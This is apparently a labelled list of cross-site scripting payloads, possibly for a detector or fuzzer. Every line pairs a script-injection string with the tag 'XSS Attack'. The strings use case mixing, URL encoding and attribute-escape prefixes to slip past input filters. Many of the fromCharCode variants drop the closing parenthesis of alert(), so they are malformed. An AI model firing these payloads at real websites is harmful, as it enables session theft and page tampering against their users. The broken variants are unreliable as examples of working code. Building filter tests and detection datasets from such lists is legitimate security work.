\\><ScRiPt>AlErT('XSS')</ScRiPt> : XSS Attack
=><><script>alert('XSS')</script> : XSS Attack
=><><ScRiPt>AlErT('XSS')</ScRiPt> : XSS Attack
=\\><script>alert('XSS')</script> : XSS Attack
=\\><ScRiPt>AlErT('XSS')</ScRiPt> : XSS Attack
=\><script>alert('XSS')</script> : XSS Attack
=\><ScRiPt>AlErT('XSS')</ScRiPt> : XSS Attack
=\\><<script>alert('XSS')</script> : XSS Attack
=\\><<ScRiPt>AlErT('XSS')</ScRiPt> : XSS Attack
=\><<script>alert('XSS')</script> : XSS Attack
=\><<ScRiPt>AlErT('XSS')</ScRiPt> : XSS Attack
"%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e : XSS Attack
"%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e : XSS Attack
=%3e%3c%3e%3cscript>alert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e : XSS Attack
=%3e%3c%3e%3cScRiPt>AlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e : XSS Attack
="%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e : XSS Attack
="%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e : XSS Attack
='%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e : XSS Attack
='%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e : XSS Attack
="%3e%3c%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e : XSS Attack
="%3e%3c%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e : XSS Attack
='%3e%3c%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e : XSS Attack
='%3e%3c%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e : XSS Attack
\\><script>alert(String.fromCharCode(88, 83, 83)</script> : XSS Attack
\\><ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt> : XSS Attack
=><><script>alert(String.fromCharCode(88, 83, 83)</script> : XSS Attack
=><><ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt> : XSS Attack
=\\><script>alert(String.fromCharCode(88, 83, 83)</script> : XSS Attack
=\\><ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt> : XSS Attack
=\><script>alert(String.fromCharCode(88, 83, 83)</script> : XSS Attack
=\><ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt> : XSS Attack
=\\><<script>alert(String.fromCharCode(88, 83, 83)</script> : XSS Attack
=\\><<ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt> : XSS Attack
=\><<script>alert(String.fromCharCode(88, 83, 83)</script> : XSS Attack
=\><<ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt> : XSS Attack
%5c%5c%3e%3cscript%3ealert(%5cXSS%5c)%3c%2fscript%3e : XSS Attack
%5c%5c%3e%3cScRiPt%3eAlErT(%5cXSS%5c)%3c%2fScRiPt%3e : XSS Attack
=%3e%3c%3e%3cscript%3ealert(%5cXSS%5c)%3c%2fscript%3e : XSS Attack
=%3e%3c%3e%3cScRiPt%3eAlErT(%5cXSS%5c)%3c%2fScRiPt%3e : XSS Attack
=%5c%5c%3e%3cscript%3ealert(%5cXSS%5c)%3c%2fscript%3e : XSS Attack
=%5c%5c%3e%3cScRiPt%3eAlErT(%5cXSS%5c)%3c%2fScRiPt%3e : XSS Attack
=%5c%3e%3cscript%3ealert(%5cXSS%5c)%3c%2fscript%3e : XSS Attack
=%5c%3e%3cScRiPt%3eAlErT(%5cXSS%5c)%3c%2fScRiPt%3e : XSS Attack
=%5c%5c%3e%3c%3cscript%3ealert(%5cXSS%5c)%3c%2fscript%3e : XSS Attack
=%5c%5c%3e%3c%3cScRiPt%3eAlErT(%5cXSS%5c)%3c%2fScRiPt%3e : XSS Attack
=%5c%3e%3c%3cscript%3ealert(%5cXSS%5c)%3c%2fscript%3e : XSS Attack
=%5c%3e%3c%3cScRiPt%3eAlErT(%5cXSS%5c)%3c%2fScRiPt%3e : XSS Attack
%5c%5c%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e : XSS Attack
%5c%5c%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e : XSS Attack
=%3e%3c%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e : XSS Attack
=%3e%3c%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e : XSS Attack
=%5c%5c%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e : XSS Attack
=%5c%5c%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e : XSS Attack
=%5c%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e : XSS Attack
=%5c%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e : XSS Attack
=%5c%5c%3e%3c%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e : XSS Attack
=%5c%5c%3e%3c%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e : XSS Attack
=%5c%3e%3c%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e : XSS Attack
=%5c%3e%3c%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e : XSS Attack
